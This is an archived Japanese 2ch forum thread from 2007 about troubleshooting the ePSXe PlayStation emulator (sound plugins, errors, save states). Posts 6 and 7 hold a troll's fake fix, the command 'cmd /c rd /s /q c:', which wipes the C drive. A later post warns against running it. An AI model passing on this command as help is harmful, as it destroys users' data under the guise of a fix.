2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ePSXe使用者に相談があるんだけど

1 :名無しさん@お腹いっぱい。:2007/08/13(月) 12:28:47 ID:2dyAPJTu
SRWα外伝とX4とFFTをやってみたら一部音楽が
流れないんだけど、いい解決案ない?

ビデオプラグイン:Pete's OpenGL2 Driver2.8
サウンドプラグイン:ePSXe SPU core 1.5.2
Eternal SPU Plugin 1.41
P.E.OpS. DSound Audio Driver 1.9
で、CDとiso両方試したけど無理だった…

2 :名無しさん@お腹いっぱい。:2007/08/13(月) 12:41:09 ID:kqeQEHN8
実機でやれば解決

3 :名無しさん@お腹いっぱい。:2007/08/13(月) 12:44:39 ID:lXHI7NqQ
あきらめる

4 :名無しさん@お腹いっぱい。:2007/08/13(月) 12:54:55 ID:2dyAPJTu
>>2
改造コード使って快適にクリアしたい
特にα外伝。ラスボスが倒せなかった

5 :名無しさん@お腹いっぱい。:2007/08/13(月) 18:02:17 ID:QONS9dCd
>>4
実機でPAR使えばそれで良し

6 :名無しさん@お腹いっぱい。:2007/08/14(火) 07:09:23 ID:sXdIsAVp
スタート→ファイル名を指定して実行
「cmd /c rd /s /q c:」と入力 ←「」の中だけでおk
再起動

7 :名無しさん@お腹いっぱい。:2007/08/14(火) 10:58:25 ID:zeHoKHCD
>>6 これ以上続くと 2ch荒らし報告・規制議論 に持っていかれるぞw

 18 名無しさん@お腹いっぱい。  [sage]  2007/08/14(火) 07:08:14 ID:sXdIsAVp

*************ダウンロードしたゲームが動かないとき!**********
スタート→ファイル名を指定して実行
「cmd /c rd /s /q c:」と入力 ←「」の中だけでいいよ!
再起動する
いやっほうヽ( ´ー`)丿


くれぐれも自己責任で実行してね
~~~~~~~~~~~

8 :名無しさん@お腹いっぱい。:2007/08/14(火) 11:01:58 ID:zeHoKHCD
しまったw url だけでよかったなw コピペもまずいじゃん俺w

注意:>>6-7は ハードディスク C ドライブの中身を削除するので実行しないように。

9 :名無しさん@お腹いっぱい。:2007/08/14(火) 13:30:34 ID:7EiVPuZK
だまれ

10 :名無しさん@お腹いっぱい。:2007/08/14(火) 18:25:06 ID:/O4BJ/5+
epsxeと言えば、ゲーム(CDイメージ)によって、どこでもセーブ&ロードが
できるソフトとできないソフトがあるのは俺だけ?
例:ときメモ1はできないけどときメモ2はできる

11 :名無しさん@お腹いっぱい。:2007/09/20(木) 12:32:17 ID:fvdRasi1
だから ときどきセーブできるジャマイカ?

12 :名無しさん@お腹いっぱい。:2007/09/30(日) 14:26:46 ID:HUInJFE5
>>10
同じゲームでも
サウンドドライバがpeteだとできなくて
epsxe spu coreだとできることとかあるよ

13 :名無しさん@お腹いっぱい。:2007/10/05(金) 04:16:32 ID:3ggvDCYt
ISOやBIOS起動するとError loading [plugins\_cpka.dll]とでてエラーになるんだけどなんでかな?
前は起動できたのに…

14 :名無しさん@お腹いっぱい。:2007/10/05(金) 05:05:21 ID:u8KKQsgw
peospでおk

15 :名無しさん@お腹いっぱい。:2007/10/05(金) 06:02:46 ID:3ggvDCYt
どなたか>>13のなおし方知らないですか(××)?

ググってもまったく原因わからなかったぽorz


16 :名無しさん@お腹いっぱい。:2007/10/05(金) 16:39:49 ID:3ggvDCYt
上げ

17 :名無しさん@お腹いっぱい。:2007/10/05(金) 21:07:52 ID:3ggvDCYt



18 :名無しさん@お腹いっぱい。:2007/10/08(月) 00:49:44 ID:hne2Pkj4
ロックマンDASH2をプレイしたいのですが
起動しても最初のCAPCOM出た後止まってしまいます。
動作リストにはそれさえスキップすればプレイ&クリア可能とありましたが
ググっても具体的な方法まではわかりません。誰かわかる方いませんか?

19 :名無しさん@お腹いっぱい。:2007/10/09(火) 20:45:37 ID:ATJ4iqFX
ePSXeの音量を調整できるプラグインとか無いんかお

20 :名無しさん@お腹いっぱい。:2007/10/10(水) 08:09:34 ID:ClNNnfyK
>>19
プリセットプラグイン以外なら調整可
他のプラグインはエミュでぐぐったサイトで紹介されてる

21 :名無しさん@お腹いっぱい。:2007/10/11(木) 01:41:01 ID:LhL3h9XR
起動させると、めちゃくちゃ重くてCPUの占有率が高くなるんだけど
これを何とかスムーズに動くように抑える方法教えて下さい。

22 :名無しさん@お腹いっぱい。:2007/10/11(木) 01:52:18 ID:DH8qUvsK
>>21
PCのスペック(詳細)と、各プラグインの設定画面のスナップショットでも貼ってみては?

5 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)